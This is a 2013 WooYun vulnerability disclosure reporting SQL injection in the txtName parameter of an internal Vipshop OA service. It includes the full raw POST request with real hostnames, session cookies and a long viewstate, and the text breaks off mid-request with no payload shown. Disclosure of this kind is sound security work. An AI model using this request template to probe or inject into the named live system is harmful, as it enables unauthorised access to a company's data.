当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042085

漏洞标题:唯品会某业务SQL注入一枚

相关厂商:唯品会

漏洞作者: loli

提交时间:2013-11-05 20:14

修复时间:2013-12-20 20:15

公开时间:2013-12-20 20:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-05: 细节已通知厂商并且等待厂商处理中
2013-11-05: 厂商已经确认,细节仅向厂商公开
2013-11-15: 细节向核心白帽子及相关领域专家公开
2013-11-25: 细节向普通白帽子公开
2013-12-05: 细节向实习白帽子公开
2013-12-20: 细节向公众公开

简要描述:

唯品会SQL注入

详细说明:

通过查看js文件中的调用找到的这个分站,只查询了user和database,看数据库名好像知道里面是什么内容了,点到为止吧。
post提交,txtName参数存在SQL注入

POST /Service/CmpntListService.aspx?appKey=APP00008&jsapiurl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fScripts%2fwp.sdk.js&proxyUrl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fproxy.htm&ownerType=employee&owner=&containerCode=81aa4b54-c708-485b-ae56-849da23b657f&areaCode=GR-2&position=0 HTTP/1.1
Host: appcenter.oa.vipshop.com:6060
Proxy-Connection: keep-alive
Content-Length: 14708
Origin: http://appcenter.oa.vipshop.com:6060
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://appcenter.oa.vipshop.com:6060/Service/CmpntListService.aspx?appKey=APP00008&jsapiurl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fScripts%2fwp.sdk.js&proxyUrl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fproxy.htm&ownerType=employee&owner=&containerCode=81aa4b54-c708-485b-ae56-849da23b657f&areaCode=GR-2&position=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: vip_wh=VIP_NH; vip_rip=2xxxxxxxx; vip_ipver=31; PAPVisitorId=117b0dcb85bbd6d8bd8eb671170c5948; vip_new_old_user=1; vip_new_b_user=1; _jzqco=%7C%7C%7C%7C%7C1.1399621424.1382969926338.1382972288711.1382972419911.1382972288711.1382972419911.0.0.0.7.7; s_nr=1382972469472; mars_pid=68; mars_cid=2980e92f07c14b29632cf85099f38942; __utma=96440987.927026635.1382969927.1382971057.1383212045.4; __utmz=96440987.1383212045.4.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); ASP.NET_SessionId=xecgem33teon5fzp4w11ky1t
sm=UpdatePanel1%7CbtnSearch&txtName=S2&hidAppKey=APP00007&hfAddedClose=1&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTE2Njg5ODkzNA8WEB4GYXBwS2V5BQhBUFAwMDAwOB4NY29udGFpbmVyQ29kZQUkODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmHghhcmVhQ29kZQUER1ItMh4IcG9zaXRpb24FATAeBW93bmVyZR4Jb3duZXJ0eXBlBQhlbXBsb3llZR4DdXNyZB4KdXNlZENtcG50czL7RAABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABOU3lzdGVtLkRhdGEsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAVU3lzdGVtLkRhdGEuRGF0YVRhYmxlAwAAABlEYXRhVGFibGUuUmVtb3RpbmdWZXJzaW9uCVhtbFNjaGVtYQtYbWxEaWZmR3JhbQMBAQ5TeXN0ZW0uVmVyc2lvbgIAAAAJAwAAAAYEAAAAmw48P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjx4czpzY2hlbWEgeG1sbnM9IiIgeG1sbnM6eHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSI%2BDQogIDx4czplbGVtZW50IG5hbWU9ImRzIj4NCiAgICA8eHM6Y29tcGxleFR5cGU%2BDQogICAgICA8eHM6c2VxdWVuY2U%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9ImlkIiBtc2RhdGE6RGF0YVR5cGU9IlN5c3RlbS5HdWlkLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9ImFwcEtleSIgdHlwZT0ieHM6c3RyaW5nIiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iY29udGFpbmVyQ29kZSIgdHlwZT0ieHM6c3RyaW5nIiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iYXJlYUNvZGUiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9InBvc2l0aW9uIiB0eXBlPSJ4czppbnQiIG1zZGF0YTp0YXJnZXROYW1lc3BhY2U9IiIgbWluT2NjdXJzPSIwIiAvPg0KICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJjb21wb25lbnRDbGFzc0lkIiBtc2RhdGE6RGF0YVR5cGU9IlN5c3RlbS5HdWlkLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9Im93bmVyIiB0eXBlPSJ4czpzdHJpbmciIG1zZGF0YTp0YXJnZXROYW1lc3BhY2U9IiIgbWluT2NjdXJzPSIwIiAvPg0KICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJvd25lclR5cGUiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9ImNyZWF0ZU9uIiB0eXBlPSJ4czpkYXRlVGltZSIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9InN0YXR1cyIgdHlwZT0ieHM6aW50IiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0idW5pbnN0YWxsT24iIHR5cGU9InhzOmRhdGVUaW1lIiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgIDwveHM6c2VxdWVuY2U%2BDQogICAgPC94czpjb21wbGV4VHlwZT4NCiAgPC94czplbGVtZW50Pg0KICA8eHM6ZWxlbWVudCBuYW1lPSJ0bXBEYXRhU2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6TWFpbkRhdGFUYWJsZT0iZHMiIG1zZGF0YTpVc2VDdXJyZW50TG9jYWxlPSJ0cnVlIj4NCiAgICA8eHM6Y29tcGxleFR5cGU%2BDQogICAgICA8eHM6Y2hvaWNlIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSJ1bmJvdW5kZWQiIC8%2BDQogICAgPC94czpjb21wbGV4VHlwZT4NCiAgPC94czplbGVtZW50Pg0KPC94czpzY2hlbWE%2BBgUAAACzNDxkaWZmZ3I6ZGlmZmdyYW0geG1sbnM6bXNkYXRhPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEiIHhtbG5zOmRpZmZncj0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtZGlmZmdyYW0tdjEiPg0KICA8dG1wRGF0YVNldD4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczEiIG1zZGF0YTpyb3dPcmRlcj0iMCI%2BDQogICAgICA8aWQ%2BZDJiMGExZTItNWUzNS00YzFmLWE2OWUtMTk3NzE3M2Y0MGViPC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj41PC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPjE4MGFhZDRkLTFkMzItNDY3OS05ODdhLTBiMDIzMTMyNWI1MjwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuODE3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMyIiBtc2RhdGE6cm93T3JkZXI9IjEiPg0KICAgICAgPGlkPmNjODRjZjFjLWVkYzgtNGVkNi1hODBhLTQ1Njk5Mzg1ZDBlNTwvaWQ%2BDQogICAgICA8YXBwS2V5PkFQUDAwMDA4PC9hcHBLZXk%2BDQogICAgICA8Y29udGFpbmVyQ29kZT44MWFhNGI1NC1jNzA4LTQ4NWItYWU1Ni04NDlkYTIzYjY1N2Y8L2NvbnRhaW5lckNvZGU%2BDQogICAgICA8YXJlYUNvZGU%2BR1ItMjwvYXJlYUNvZGU%2BDQogICAgICA8cG9zaXRpb24%2BNzwvcG9zaXRpb24%2BDQogICAgICA8Y29tcG9uZW50Q2xhc3NJZD42YzVjZTRjNy1iMTdlLTQyYWQtOWUyYy03NzFjODExZjE4MDU8L2NvbXBvbmVudENsYXNzSWQ%2BDQogICAgICA8b3duZXIgLz4NCiAgICAgIDxvd25lclR5cGU%2BZW1wbG95ZWU8L293bmVyVHlwZT4NCiAgICAgIDxjcmVhdGVPbj4yMDEzLTA2LTI0VDAwOjMzOjA3LjgzMyswODowMDwvY3JlYXRlT24%2BDQogICAgICA8c3RhdHVzPjA8L3N0YXR1cz4NCiAgICA8L2RzPg0KICAgIDxkcyBkaWZmZ3I6aWQ9ImRzMyIgbXNkYXRhOnJvd09yZGVyPSIyIj4NCiAgICAgIDxpZD44ZDBkOGRmOC02MTgzLTQyZWMtYWI1NS00NTk3YjNlNzU4ODI8L2lkPg0KICAgICAgPGFwcEtleT5BUFAwMDAwODwvYXBwS2V5Pg0KICAgICAgPGNvbnRhaW5lckNvZGU%2BODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmPC9jb250YWluZXJDb2RlPg0KICAgICAgPGFyZWFDb2RlPkdSLTI8L2FyZWFDb2RlPg0KICAgICAgPHBvc2l0aW9uPjI8L3Bvc2l0aW9uPg0KICAgICAgPGNvbXBvbmVudENsYXNzSWQ%2BNjllNzg0YTUtMzFjMi00Y2U1LTgxNTktNzliMjNhOTM1NWY3PC9jb21wb25lbnRDbGFzc0lkPg0KICAgICAgPG93bmVyIC8%2BDQogICAgICA8b3duZXJUeXBlPmVtcGxveWVlPC9vd25lclR5cGU%2BDQogICAgICA8Y3JlYXRlT24%2BMjAxMy0wNi0yNFQwMDozMzowNy43ODMrMDg6MDA8L2NyZWF0ZU9uPg0KICAgICAgPHN0YXR1cz4wPC9zdGF0dXM%2BDQogICAgPC9kcz4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczQiIG1zZGF0YTpyb3dPcmRlcj0iMyI%2BDQogICAgICA8aWQ%2BYTljZmYzNTktNGEwOC00NTlmLWExMTQtNTI1NWY0MzhjNmI5PC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj4yPC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPjZjNWNlNGM3LWIxN2UtNDJhZC05ZTJjLTc3MWM4MTFmMTgwNTwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMTEtMDVUMDE6MTM6NTQuMDQ3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHM1IiBtc2RhdGE6cm93T3JkZXI9IjQiPg0KICAgICAgPGlkPjczYzMzMzVlLTMwYWItNGU3NC1hODQxLTUyY2UyYThlNjYxMDwvaWQ%2BDQogICAgICA8YXBwS2V5PkFQUDAwMDA4PC9hcHBLZXk%2BDQogICAgICA8Y29udGFpbmVyQ29kZT44MWFhNGI1NC1jNzA4LTQ4NWItYWU1Ni04NDlkYTIzYjY1N2Y8L2NvbnRhaW5lckNvZGU%2BDQogICAgICA8YXJlYUNvZGU%2BR1ItMjwvYXJlYUNvZGU%2BDQogICAgICA8cG9zaXRpb24%2BODwvcG9zaXRpb24%2BDQogICAgICA8Y29tcG9uZW50Q2xhc3NJZD5kZjhjM2NjZi0yNjliLTQ2MTMtOWNmYS1lZTUxODk1NTNjMjU8L2NvbXBvbmVudENsYXNzSWQ%2BDQogICAgICA8b3duZXIgLz4NCiAgICAgIDxvd25lclR5cGU%2BZW1wbG95ZWU8L293bmVyVHlwZT4NCiAgICAgIDxjcmVhdGVPbj4yMDEzLTA2LTI0VDAwOjMzOjA3LjgzMyswODowMDwvY3JlYXRlT24%2BDQogICAgICA8c3RhdHVzPjA8L3N0YXR1cz4NCiAgICA8L2RzPg0KICAgIDxkcyBkaWZmZ3I6aWQ9ImRzNiIgbXNkYXRhOnJvd09yZGVyPSI1Ij4NCiAgICAgIDxpZD40MTQyMTk0NC01MWM1LTQ2MTAtYjFlYy02MGM2ZWJhNmY2MDM8L2lkPg0KICAgICAgPGFwcEtleT5BUFAwMDAwODwvYXBwS2V5Pg0KICAgICAgPGNvbnRhaW5lckNvZGU%2BODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmPC9jb250YWluZXJDb2RlPg0KICAgICAgPGFyZWFDb2RlPkdSLTI8L2FyZWFDb2RlPg0KICAgICAgPHBvc2l0aW9uPjE8L3Bvc2l0aW9uPg0KICAgICAgPGNvbXBvbmVudENsYXNzSWQ%2BNmM1Y2U0YzctYjE3ZS00MmFkLTllMmMtNzcxYzgxMWYxODA1PC9jb21wb25lbnRDbGFzc0lkPg0KICAgICAgPG93bmVyIC8%2BDQogICAgICA8b3duZXJUeXBlPmVtcGxveWVlPC9vd25lclR5cGU%2BDQogICAgICA8Y3JlYXRlT24%2BMjAxMy0wNi0yNFQwMDozMzo1MS4xMjMrMDg6MDA8L2NyZWF0ZU9uPg0KICAgICAgPHN0YXR1cz4wPC9zdGF0dXM%2BDQogICAgPC9kcz4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczciIG1zZGF0YTpyb3dPcmRlcj0iNiI%2BDQogICAgICA8aWQ%2BNGEwNmI5M2UtNWQwMi00NTIxLWEzOGUtNmZmZWRjZGNhMjk2PC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj4xPC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPmE4ZWJjYmE5LWUyYjMtNDIwZS04YzkzLTI0NmM1ZWRmOWJlNjwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuNzUzKzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHM4IiBtc2RhdGE6cm93T3JkZXI9IjciPg0KICAgICAgPGlkPjIyNjM5ZjVmLWEwYjctNDZjZC1iYmViLTc3ZWY4NzM5YzAzNjwvaWQ%2BDQogICAgICA8YXBwS2V5PkFQUDAwMDA4PC9hcHBLZXk%2BDQogICAgICA8Y29udGFpbmVyQ29kZT44MWFhNGI1NC1jNzA4LTQ4NWItYWU1Ni04NDlkYTIzYjY1N2Y8L2NvbnRhaW5lckNvZGU%2BDQogICAgICA8YXJlYUNvZGU%2BR1ItMjwvYXJlYUNvZGU%2BDQogICAgICA8cG9zaXRpb24%2BNDwvcG9zaXRpb24%2BDQogICAgICA8Y29tcG9uZW50Q2xhc3NJZD5mNzM0ZTQzZC1mNmE4LTRmOTYtODUxNC1jZTRmYWJiZDViY2U8L2NvbXBvbmVudENsYXNzSWQ%2BDQogICAgICA8b3duZXIgLz4NCiAgICAgIDxvd25lclR5cGU%2BZW1wbG95ZWU8L293bmVyVHlwZT4NCiAgICAgIDxjcmVhdGVPbj4yMDEzLTA2LTI0VDAwOjMzOjA3LjgrMDg6MDA8L2NyZWF0ZU9uPg0KICAgICAgPHN0YXR1cz4wPC9zdGF0dXM%2BDQogICAgPC9kcz4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczkiIG1zZGF0YTpyb3dPcmRlcj0iOCI%2BDQogICAgICA8aWQ%2BZGI5ZGEyZGEtYWVmNC00MDIwLWJlYmUtODcyMDdkYzA3NmVlPC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj4xPC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPmY3MzRlNDNkLWY2YTgtNGY5Ni04NTE0LWNlNGZhYmJkNWJjZTwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMTEtMDVUMDE6MTM6NDkuMTk3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMCIgbXNkYXRhOnJvd09yZGVyPSI5Ij4NCiAgICAgIDxpZD5lNzI4MmZiMS0xODljLTRiM2UtOWRkNS05ODg2YWEzOTlkY2U8L2lkPg0KICAgICAgPGFwcEtleT5BUFAwMDAwODwvYXBwS2V5Pg0KICAgICAgPGNvbnRhaW5lckNvZGU%2BODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmPC9jb250YWluZXJDb2RlPg0KICAgICAgPGFyZWFDb2RlPkdSLTI8L2FyZWFDb2RlPg0KICAgICAgPHBvc2l0aW9uPjM8L3Bvc2l0aW9uPg0KICAgICAgPGNvbXBvbmVudENsYXNzSWQ%2BNWI3NTBhZjgtNTllMi00NTQxLThlNjgtYTEzNDhhMzAxNzFlPC9jb21wb25lbnRDbGFzc0lkPg0KICAgICAgPG93bmVyIC8%2BDQogICAgICA8b3duZXJUeXBlPmVtcGxveWVlPC9vd25lclR5cGU%2BDQogICAgICA8Y3JlYXRlT24%2BMjAxMy0wNi0yNFQwMDozMzowNy44KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMSIgbXNkYXRhOnJvd09yZGVyPSIxMCI%2BDQogICAgICA8aWQ%2BNjYxYjFmYWMtNTUzYi00ZTc3LThjZTAtYTA4ODNlZGUzOTk3PC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj42PC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPmJjNTU3NDYwLTE5YjctNDZmOS04MTljLWFiNzlhMDRmN2IyYTwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuODE3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMiIgbXNkYXRhOnJvd09yZGVyPSIxMSI%2BDQogICAgICA8aWQ%2BMjljMDBhMTAtYjMyOS00MGE2LWFjNmItY2FmYTU2YWFhMmUxPC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj45PC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPjZjNGJhYzIyLWM1MWYtNGQ5NC05MWQ5LTc2YzliOGQ4YTAwNDwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuODQ3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMyIgbXNkYXRhOnJvd09yZGVyPSIxMiI%2BDQogICAgICA8aWQ%2BNTFhOTZmMTItODg4Ny00MzI0LWJlZTMtZGM2N2ZiMTYzYjA0PC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj4xPC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPjZjNWNlNGM3LWIxN2UtNDJhZC05ZTJjLTc3MWM4MTFmMTgwNTwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDktMThUMTU6Mjg6MTAuNzErMDg6MDA8L2NyZWF0ZU9uPg0KICAgICAgPHN0YXR1cz4wPC9zdGF0dXM%2BDQogICAgPC9kcz4NCiAgPC90bXBEYXRhU2V0Pg0KPC9kaWZmZ3I6ZGlmZmdyYW0%2BBAMAAAAOU3lzdGVtLlZlcnNpb24EAAAABl9NYWpvcgZfTWlub3IGX0J1aWxkCV9SZXZpc2lvbgAAAAAICAgIAgAAAAAAAAD%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwsWAmYPZBYCAgMPZBYCZg9kFgQCBQ8WAh4LXyFJdGVtQ291bnQCAxYGAgEPZBYGAgEPFgIeBXZhbHVlBSQ2YzVjZTRjNy1iMTdlLTQyYWQtOWUyYy03NzFjODExZjE4MDVkAgIPFQZNVXBsb2FkL0NtcG50SW1hZ2VzL2ljb25hZGRkMWY1NC1hZTRjLTRkNWEtYTA4OC02ZWViMDhlODQwMGMyMDExMTIwNTA1MDgxNy5wbmckNmM1Y2U0YzctYjE3ZS00MmFkLTllMmMtNzcxYzgxMWYxODA1D1MyLeeUs%2Bivt%2BiusOW9lTDln7rkuo7mlrDlvJXmk47nmoTlt6XkvZzmtYHnlLPor7fliJfooajnu4Tku7bvvIEw5Z%2B65LqO5paw5byV5pOO55qE5bel5L2c5rWB55Sz6K%2B35YiX6KGo57uE5Lu277yBCeW3sua3u%2BWKoGQCAw8PFgIeD0NvbW1hbmRBcmd1bWVudAUkNmM1Y2U0YzctYjE3ZS00MmFkLTllMmMtNzcxYzgxMWYxODA1ZGQCAg9kFgYCAQ8WAh8JBSRkZjhjM2NjZi0yNjliLTQ2MTMtOWNmYS1lZTUxODk1NTNjMjVkAgIPFQZNVXBsb2FkL0NtcG50SW1hZ2VzL2ljb25kMjVmYTYxOC02MTZiLTQyMGYtYmFiMS00ZTMwZDdjZjE2YTIyMDExMTIwNTA1MTcwMi5wbmckZGY4YzNjY2YtMjY5Yi00NjEzLTljZmEtZWU1MTg5NTUzYzI1D1MyLeW%2BhemYheaUtuaWhyrln7rkuo7mlrDlvJXmk47nmoTlt6XkvZzmtYHmlLbmlofnu4Tku7bvvIEq5Z%2B65LqO5paw5byV5pOO55qE5bel5L2c5rWB5pS25paH57uE5Lu277yBCeW3sua3u%2BWKoGQCAw8PFgIfCgUkZGY4YzNjY2YtMjY5Yi00NjEzLTljZmEtZWU1MTg5NTUzYzI1ZGQCAw9kFgYCAQ8WAh8JBSQ2YzRiYWMyMi1jNTFmLTRkOTQtOTFkOS03NmM5YjhkOGEwMDRkAgIPFQZNVXBsb2FkL0NtcG50SW1hZ2VzL2ljb25jNjUxMDczOS05MGM2LTQzM2QtYjg4Mi1lNDExNThiMGI1MjcyMDExMTIwNTA1MDk0NS5wbmckNmM0YmFjMjItYzUxZi00ZDk0LTkxZDktNzZjOWI4ZDhhMDA0ElMyLeW%2BheWuoeaJuea1geeoizDmlrDlvJXmk47lr7nlupTnmoTku6Plip7lt6XkvZzpobnliJfooajnu4Tku7bvvIEw5paw5byV5pOO5a%2B55bqU55qE5Luj5Yqe5bel5L2c6aG55YiX6KGo57uE5Lu277yBCeW3sua3u%2BWKoGQCAw8PFgIfCgUkNmM0YmFjMjItYzUxZi00ZDk0LTkxZDktNzZjOWI4ZDhhMDA0ZGQCBw8PFgYeC1JlY29yZENvdW50BQEzHhBDdXJyZW50UGFnZUluZGV4BQExHglQYWdlQ291bnQFATFkFgJmD2QWEAIBDw8WBh4IQ3NzQ2xhc3MFDWN1dGVwYWdlIHByZXYeB0VuYWJsZWRoHgRfIVNCAgJkZAIDDxYCHgdWaXNpYmxlaGQCBQ8WAh8RaGQCBw8WAh8IAgEWAmYPZBYCAgEPDxYIHwoFATEfDgUIc2VsZWN0ZWQfD2gfEAICZBYCZg8VAQExZAIJDxYCHxFoZAILDxYCHxFoZAINDw8WBh8OBQ1jdXRlcGFnZSBuZXh0Hw9oHxACAmRkAg8PDxYCHgRUZXh0BRvnrKwx6aG1Jm5ic3A7LyZuYnNwO%2BWFsTHpobVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUhcnBDbXBudEx